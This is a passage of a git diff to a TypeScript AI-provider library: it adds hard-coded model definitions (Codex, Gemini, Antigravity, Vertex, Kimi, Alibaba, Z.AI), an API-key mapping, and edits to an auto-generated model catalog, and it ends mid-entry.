"gpt-5.2", + name: "GPT-5.2", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.2-codex", + name: "GPT-5.2 Codex", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.3-codex", + name: "GPT-5.3 Codex", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: 
{ input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.4", + name: "GPT-5.4", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 2.5, output: 15, cacheRead: 0.25, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.3-codex-spark", + name: "GPT-5.3 Codex Spark", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 128000, + maxTokens: CODEX_MAX_TOKENS, + }, + ]; + allModels.push(...codexModels); + + // Add missing Grok models + if (!allModels.some(m => m.provider === "xai" && m.id === "grok-code-fast-1")) { + allModels.push({ + id: "grok-code-fast-1", + name: "Grok Code Fast 1", + api: "openai-completions", + baseUrl: "https://api.x.ai/v1", + provider: "xai", + reasoning: false, + input: ["text"], + cost: { + input: 0.2, + output: 1.5, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 32768, + maxTokens: 8192, + }); + } + + // Add "auto" alias for openrouter/auto + if (!allModels.some(m => m.provider === "openrouter" && m.id === "auto")) { + allModels.push({ + id: "auto", + name: "Auto", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + // we dont know about the costs because OpenRouter auto routes to different models + // and then charges you for the underlying used model + input:0, + output:0, + cacheRead:0, + cacheWrite:0, + }, + contextWindow: 2000000, + maxTokens: 30000, + }); + } + + // Google Cloud Code Assist models (Gemini CLI) + // Uses production endpoint, standard Gemini models only + const CLOUD_CODE_ASSIST_ENDPOINT = 
"https://cloudcode-pa.googleapis.com"; + const cloudCodeAssistModels: Model<"google-gemini-cli">[] = [ + { + id: "gemini-2.5-pro", + name: "Gemini 2.5 Pro (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-2.5-flash", + name: "Gemini 2.5 Flash (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-2.0-flash", + name: "Gemini 2.0 Flash (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, + reasoning: false, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 8192, + }, + { + id: "gemini-3-pro-preview", + name: "Gemini 3 Pro Preview (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-3-flash-preview", + name: "Gemini 3 Flash Preview (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-3.1-pro-preview", + name: "Gemini 3.1 Pro Preview (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, 
+ reasoning: true, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + ]; + allModels.push(...cloudCodeAssistModels); + + // Antigravity models (Gemini 3, Claude, GPT-OSS via Google Cloud) + // Uses sandbox endpoint and different OAuth credentials for access to additional models + const ANTIGRAVITY_ENDPOINT = "https://daily-cloudcode-pa.sandbox.googleapis.com"; + const antigravityModels: Model<"google-gemini-cli">[] = [ + { + id: "gemini-3.1-pro-high", + name: "Gemini 3.1 Pro High (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + // the Model type doesn't seem to support having extended-context costs, so I'm just using the pricing for <200k input + cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 2.375 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-3.1-pro-low", + name: "Gemini 3.1 Pro Low (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + // the Model type doesn't seem to support having extended-context costs, so I'm just using the pricing for <200k input + cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 2.375 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-3-flash", + name: "Gemini 3 Flash (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.5, output: 3, cacheRead: 0.5, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "claude-sonnet-4-5", + name: "Claude Sonnet 4.5 (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: false, + input: ["text", "image"], + cost: { input: 3, 
output: 15, cacheRead: 0.3, cacheWrite: 3.75 }, + contextWindow: 200000, + maxTokens: 64000, + }, + { + id: "claude-sonnet-4-5-thinking", + name: "Claude Sonnet 4.5 Thinking (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 3, output: 15, cacheRead: 0.3, cacheWrite: 3.75 }, + contextWindow: 200000, + maxTokens: 64000, + }, + { + id: "claude-opus-4-5-thinking", + name: "Claude Opus 4.5 Thinking (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 }, + contextWindow: 200000, + maxTokens: 64000, + }, + { + id: "claude-opus-4-6-thinking", + name: "Claude Opus 4.6 Thinking (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 }, + contextWindow: 200000, + maxTokens: 128000, + }, + { + id: "claude-sonnet-4-6", + name: "Claude Sonnet 4.6 (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 3, output: 15, cacheRead: 0.3, cacheWrite: 3.75 }, + contextWindow: 200000, + maxTokens: 64000, + }, + { + id: "gpt-oss-120b-medium", + name: "GPT-OSS 120B Medium (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: false, + input: ["text"], + cost: { input: 0.09, output: 0.36, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 131072, + maxTokens: 32768, + }, + ]; + allModels.push(...antigravityModels); + + const VERTEX_BASE_URL = "https://{location}-aiplatform.googleapis.com"; + const vertexModels: Model<"google-vertex">[] = [ + { + id: 
"gemini-3-pro-preview", + name: "Gemini 3 Pro Preview (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 0 }, + contextWindow: 1000000, + maxTokens: 64000, + }, + { + id: "gemini-3.1-pro-preview", + name: "Gemini 3.1 Pro Preview (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-3-flash-preview", + name: "Gemini 3 Flash Preview (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.5, output: 3, cacheRead: 0.05, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-2.0-flash", + name: "Gemini 2.0 Flash (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: false, + input: ["text", "image"], + cost: { input: 0.15, output: 0.6, cacheRead: 0.0375, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 8192, + }, + { + id: "gemini-2.0-flash-lite", + name: "Gemini 2.0 Flash Lite (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.075, output: 0.3, cacheRead: 0.01875, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-2.5-pro", + name: "Gemini 2.5 Pro (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 1.25, output: 10, cacheRead: 0.125, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-2.5-flash", + name: "Gemini 2.5 Flash (Vertex)", + api: 
"google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.3, output: 2.5, cacheRead: 0.03, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-2.5-flash-lite-preview-09-2025", + name: "Gemini 2.5 Flash Lite Preview 09-25 (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.1, output: 0.4, cacheRead: 0.01, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-2.5-flash-lite", + name: "Gemini 2.5 Flash Lite (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.1, output: 0.4, cacheRead: 0.01, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-1.5-pro", + name: "Gemini 1.5 Pro (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: false, + input: ["text", "image"], + cost: { input: 1.25, output: 5, cacheRead: 0.3125, cacheWrite: 0 }, + contextWindow: 1000000, + maxTokens: 8192, + }, + { + id: "gemini-1.5-flash", + name: "Gemini 1.5 Flash (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: false, + input: ["text", "image"], + cost: { input: 0.075, output: 0.3, cacheRead: 0.01875, cacheWrite: 0 }, + contextWindow: 1000000, + maxTokens: 8192, + }, + { + id: "gemini-1.5-flash-8b", + name: "Gemini 1.5 Flash-8B (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: false, + input: ["text", "image"], + cost: { input: 0.0375, output: 0.15, cacheRead: 0.01, cacheWrite: 0 }, + contextWindow: 1000000, + maxTokens: 8192, + }, + ]; + allModels.push(...vertexModels); + + // Kimi For Coding models (Moonshot AI's Anthropic-compatible coding API) + 
// Static fallback in case models.dev doesn't have them yet + const KIMI_CODING_BASE_URL = "https://api.kimi.com/coding"; + const kimiCodingModels: Model<"anthropic-messages">[] = [ + { + id: "kimi-k2-thinking", + name: "Kimi K2 Thinking", + api: "anthropic-messages", + provider: "kimi-coding", + baseUrl: KIMI_CODING_BASE_URL, + reasoning: true, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 262144, + maxTokens: 32768, + }, + { + id: "k2p5", + name: "Kimi K2.5", + api: "anthropic-messages", + provider: "kimi-coding", + baseUrl: KIMI_CODING_BASE_URL, + reasoning: true, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 262144, + maxTokens: 32768, + }, + ]; + // Only add if not already present from models.dev + for (const model of kimiCodingModels) { + if (!allModels.some(m => m.provider === "kimi-coding" && m.id === model.id)) { + allModels.push(model); + } + } + + const azureOpenAiModels: Model[] = allModels + .filter((model) => model.provider === "openai" && model.api === "openai-responses") + .map((model) => ({ + ...model, + api: "azure-openai-responses", + provider: "azure-openai-responses", + baseUrl: "", + })); + allModels.push(...azureOpenAiModels); + + // Group by provider and deduplicate by model ID + const providers: Record>> = {}; + for (const model of allModels) { + if (!providers[model.provider]) { + providers[model.provider] = {}; + } + // Use model ID as key to automatically deduplicate + // Only add if not already present (models.dev takes priority over OpenRouter) + if (!providers[model.provider][model.id]) { + providers[model.provider][model.id] = model; + } + } + + // Generate TypeScript file + let output = `// This file is auto-generated by scripts/generate-models.ts +// Do not edit manually - run 'npm run generate-models' to update + +import type { Model } from "./types.js"; + +export const MODELS = { +`; + + // Generate provider sections (sorted 
for deterministic output) + const sortedProviderIds = Object.keys(providers).sort(); + for (const providerId of sortedProviderIds) { + const models = providers[providerId]; + output += `\t${JSON.stringify(providerId)}: {\n`; + + const sortedModelIds = Object.keys(models).sort(); + for (const modelId of sortedModelIds) { + const model = models[modelId]; + output += `\t\t"${model.id}": {\n`; + output += `\t\t\tid: "${model.id}",\n`; + output += `\t\t\tname: "${model.name}",\n`; + output += `\t\t\tapi: "${model.api}",\n`; + output += `\t\t\tprovider: "${model.provider}",\n`; + if (model.baseUrl !== undefined) { + output += `\t\t\tbaseUrl: "${model.baseUrl}",\n`; + } + if (model.headers) { + output += `\t\t\theaders: ${JSON.stringify(model.headers)},\n`; + } + if (model.compat) { + output += ` compat: ${JSON.stringify(model.compat)}, +`; + } + output += `\t\t\treasoning: ${model.reasoning},\n`; + output += `\t\t\tinput: [${model.input.map(i => `"${i}"`).join(", ")}],\n`; + output += `\t\t\tcost: {\n`; + output += `\t\t\t\tinput: ${model.cost.input},\n`; + output += `\t\t\t\toutput: ${model.cost.output},\n`; + output += `\t\t\t\tcacheRead: ${model.cost.cacheRead},\n`; + output += `\t\t\t\tcacheWrite: ${model.cost.cacheWrite},\n`; + output += `\t\t\t},\n`; + output += `\t\t\tcontextWindow: ${model.contextWindow},\n`; + output += `\t\t\tmaxTokens: ${model.maxTokens},\n`; + output += `\t\t} satisfies Model<"${model.api}">,\n`; + } + + output += `\t},\n`; + } + + output += `} as const; +`; + + // Write file + writeFileSync(join(packageRoot, "src/models.generated.ts"), output); + console.log("Generated src/models.generated.ts"); + + // Print statistics + const totalModels = allModels.length; + const reasoningModels = allModels.filter(m => m.reasoning).length; + + console.log(`\nModel Statistics:`); + console.log(` Total tool-capable models: ${totalModels}`); + console.log(` Reasoning-capable models: ${reasoningModels}`); + + for (const [provider, models] of 
Object.entries(providers)) { + console.log(` ${provider}: ${Object.keys(models).length} models`); + } +} + +// Run the generator +generateModels().catch(console.error); diff --git a/packages/pi-ai/src/env-api-keys.ts b/packages/pi-ai/src/env-api-keys.ts index b6577d99d..1036c4b28 100644 --- a/packages/pi-ai/src/env-api-keys.ts +++ b/packages/pi-ai/src/env-api-keys.ts @@ -137,6 +137,7 @@ export function getEnvApiKey(provider: any): string | undefined { "opencode-go": "OPENCODE_API_KEY", "kimi-coding": "KIMI_API_KEY", "alibaba-coding-plan": "ALIBABA_API_KEY", + ollama: "OLLAMA_API_KEY", "ollama-cloud": "OLLAMA_API_KEY", "custom-openai": "CUSTOM_OPENAI_API_KEY", }; diff --git a/packages/pi-ai/src/index.ts b/packages/pi-ai/src/index.ts index a75aaf7f4..c8d9e1e8c 100644 --- a/packages/pi-ai/src/index.ts +++ b/packages/pi-ai/src/index.ts @@ -27,4 +27,5 @@ export type { } from "./utils/oauth/types.js"; export * from "./utils/overflow.js"; export * from "./utils/typebox-helpers.js"; +export * from "./utils/repair-tool-json.js"; export * from "./utils/validation.js"; diff --git a/packages/pi-ai/src/models.custom.ts b/packages/pi-ai/src/models.custom.ts new file mode 100644 index 000000000..c3cc5ac04 --- /dev/null +++ b/packages/pi-ai/src/models.custom.ts @@ -0,0 +1,197 @@ +// Manually-maintained model definitions for providers NOT tracked by models.dev. +// +// The auto-generated file (models.generated.ts) is rebuilt from the models.dev +// third-party catalog. Providers that use proprietary endpoints and are not +// listed on models.dev must be defined here so they survive regeneration. +// +// See: https://github.com/gsd-build/gsd-2/issues/2339 +// +// To add a custom provider: +// 1. Add its model definitions below following the existing pattern. +// 2. Add its API key mapping to env-api-keys.ts. +// 3. Add its provider name to KnownProvider in types.ts (if not already there). 
+ +import type { Model } from "./types.js"; + +export const CUSTOM_MODELS = { + // ─── Alibaba Coding Plan ───────────────────────────────────────────── + // Direct Alibaba DashScope Coding Plan endpoint (OpenAI-compatible). + // NOT the same as alibaba/* models on OpenRouter — different endpoint & auth. + // Original PR: #295 | Fixes: #1003, #1055, #1057 + "alibaba-coding-plan": { + "qwen3.5-plus": { + id: "qwen3.5-plus", + name: "Qwen3.5 Plus", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 983616, + maxTokens: 65536, + compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "qwen3-max-2026-01-23": { + id: "qwen3-max-2026-01-23", + name: "Qwen3 Max 2026-01-23", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 258048, + maxTokens: 32768, + compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "qwen3-coder-next": { + id: "qwen3-coder-next", + name: "Qwen3 Coder Next", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: false, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 204800, + maxTokens: 65536, + compat: { supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "qwen3-coder-plus": { + id: "qwen3-coder-plus", + name: "Qwen3 Coder Plus", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: false, + input: 
["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 997952, + maxTokens: 65536, + compat: { supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "MiniMax-M2.5": { + id: "MiniMax-M2.5", + name: "MiniMax M2.5", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 196608, + maxTokens: 65536, + compat: { + supportsStore: false, + supportsDeveloperRole: false, + supportsReasoningEffort: true, + maxTokensField: "max_tokens", + }, + } satisfies Model<"openai-completions">, + "glm-5": { + id: "glm-5", + name: "GLM-5", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 202752, + maxTokens: 16384, + compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "glm-4.7": { + id: "glm-4.7", + name: "GLM-4.7", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 169984, + maxTokens: 16384, + compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "kimi-k2.5": { + id: "kimi-k2.5", + name: "Kimi K2.5", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 258048, + maxTokens: 32768, + compat: { thinkingFormat: "zai", 
supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + }, + + // ─── Z.AI (GLM-5.1) ──────────────────────────────────────────────── + // GLM-5.1 is the latest GLM model from Zhipu AI, not yet in models.dev. + // Uses the Z.AI Coding Plan endpoint (OpenAI-compatible). + // Ref: https://docs.z.ai/devpack/using5.1 + "zai": { + "glm-5.1": { + id: "glm-5.1", + name: "GLM-5.1", + api: "openai-completions", + provider: "zai", + baseUrl: "https://api.z.ai/api/coding/paas/v4", + reasoning: true, + input: ["text"], + cost: { + input: 1, + output: 3.2, + cacheRead: 0.2, + cacheWrite: 0, + }, + contextWindow: 204800, + maxTokens: 131072, + compat: { thinkingFormat: "zai", supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + }, +} as const; diff --git a/packages/pi-ai/src/models.generated.ts b/packages/pi-ai/src/models.generated.ts index ac56d2069..e62965533 100644 --- a/packages/pi-ai/src/models.generated.ts +++ b/packages/pi-ai/src/models.generated.ts @@ -90,40 +90,6 @@ export const MODELS = { contextWindow: 300000, maxTokens: 8192, } satisfies Model<"bedrock-converse-stream">, - "amazon.titan-text-express-v1": { - id: "amazon.titan-text-express-v1", - name: "Titan Text G1 - Express", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: false, - input: ["text"], - cost: { - input: 0.2, - output: 0.6, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 4096, - } satisfies Model<"bedrock-converse-stream">, - "amazon.titan-text-express-v1:0:8k": { - id: "amazon.titan-text-express-v1:0:8k", - name: "Titan Text G1 - Express", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: false, - input: ["text"], - cost: { - input: 0.2, - output: 0.6, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 4096, - } satisfies 
Model<"bedrock-converse-stream">, "anthropic.claude-3-5-haiku-20241022-v1:0": { id: "anthropic.claude-3-5-haiku-20241022-v1:0", name: "Claude Haiku 3.5", @@ -209,40 +175,6 @@ export const MODELS = { contextWindow: 200000, maxTokens: 4096, } satisfies Model<"bedrock-converse-stream">, - "anthropic.claude-3-opus-20240229-v1:0": { - id: "anthropic.claude-3-opus-20240229-v1:0", - name: "Claude Opus 3", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: false, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 200000, - maxTokens: 4096, - } satisfies Model<"bedrock-converse-stream">, - "anthropic.claude-3-sonnet-20240229-v1:0": { - id: "anthropic.claude-3-sonnet-20240229-v1:0", - name: "Claude Sonnet 3", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: false, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 200000, - maxTokens: 4096, - } satisfies Model<"bedrock-converse-stream">, "anthropic.claude-haiku-4-5-20251001-v1:0": { id: "anthropic.claude-haiku-4-5-20251001-v1:0", name: "Claude Haiku 4.5", @@ -325,7 +257,7 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"bedrock-converse-stream">, "anthropic.claude-sonnet-4-20250514-v1:0": { @@ -376,43 +308,9 @@ export const MODELS = { cacheRead: 0.3, cacheWrite: 3.75, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 64000, } satisfies Model<"bedrock-converse-stream">, - "cohere.command-r-plus-v1:0": { - id: "cohere.command-r-plus-v1:0", - name: "Command R+", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: 
false, - input: ["text"], - cost: { - input: 3, - output: 15, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 4096, - } satisfies Model<"bedrock-converse-stream">, - "cohere.command-r-v1:0": { - id: "cohere.command-r-v1:0", - name: "Command R", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: false, - input: ["text"], - cost: { - input: 0.5, - output: 1.5, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 4096, - } satisfies Model<"bedrock-converse-stream">, "deepseek.r1-v1:0": { id: "deepseek.r1-v1:0", name: "DeepSeek-R1", @@ -447,8 +345,8 @@ export const MODELS = { contextWindow: 163840, maxTokens: 81920, } satisfies Model<"bedrock-converse-stream">, - "deepseek.v3.2-v1:0": { - id: "deepseek.v3.2-v1:0", + "deepseek.v3.2": { + id: "deepseek.v3.2", name: "DeepSeek-V3.2", api: "bedrock-converse-stream", provider: "amazon-bedrock", @@ -512,7 +410,7 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"bedrock-converse-stream">, "eu.anthropic.claude-sonnet-4-20250514-v1:0": { @@ -563,7 +461,7 @@ export const MODELS = { cacheRead: 0.3, cacheWrite: 3.75, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 64000, } satisfies Model<"bedrock-converse-stream">, "global.anthropic.claude-haiku-4-5-20251001-v1:0": { @@ -614,7 +512,7 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"bedrock-converse-stream">, "global.anthropic.claude-sonnet-4-20250514-v1:0": { @@ -665,7 +563,7 @@ export const MODELS = { cacheRead: 0.3, cacheWrite: 3.75, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 64000, } satisfies Model<"bedrock-converse-stream">, "google.gemma-3-27b-it": { @@ -702,6 +600,23 @@ export const MODELS = { 
contextWindow: 128000, maxTokens: 4096, } satisfies Model<"bedrock-converse-stream">, + "meta.llama3-1-405b-instruct-v1:0": { + id: "meta.llama3-1-405b-instruct-v1:0", + name: "Llama 3.1 405B Instruct", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: false, + input: ["text"], + cost: { + input: 2.4, + output: 2.4, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 4096, + } satisfies Model<"bedrock-converse-stream">, "meta.llama3-1-70b-instruct-v1:0": { id: "meta.llama3-1-70b-instruct-v1:0", name: "Llama 3.1 70B Instruct", @@ -889,6 +804,40 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"bedrock-converse-stream">, + "mistral.devstral-2-123b": { + id: "mistral.devstral-2-123b", + name: "Devstral 2 123B", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: false, + input: ["text"], + cost: { + input: 0.4, + output: 2, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 256000, + maxTokens: 8192, + } satisfies Model<"bedrock-converse-stream">, + "mistral.magistral-small-2509": { + id: 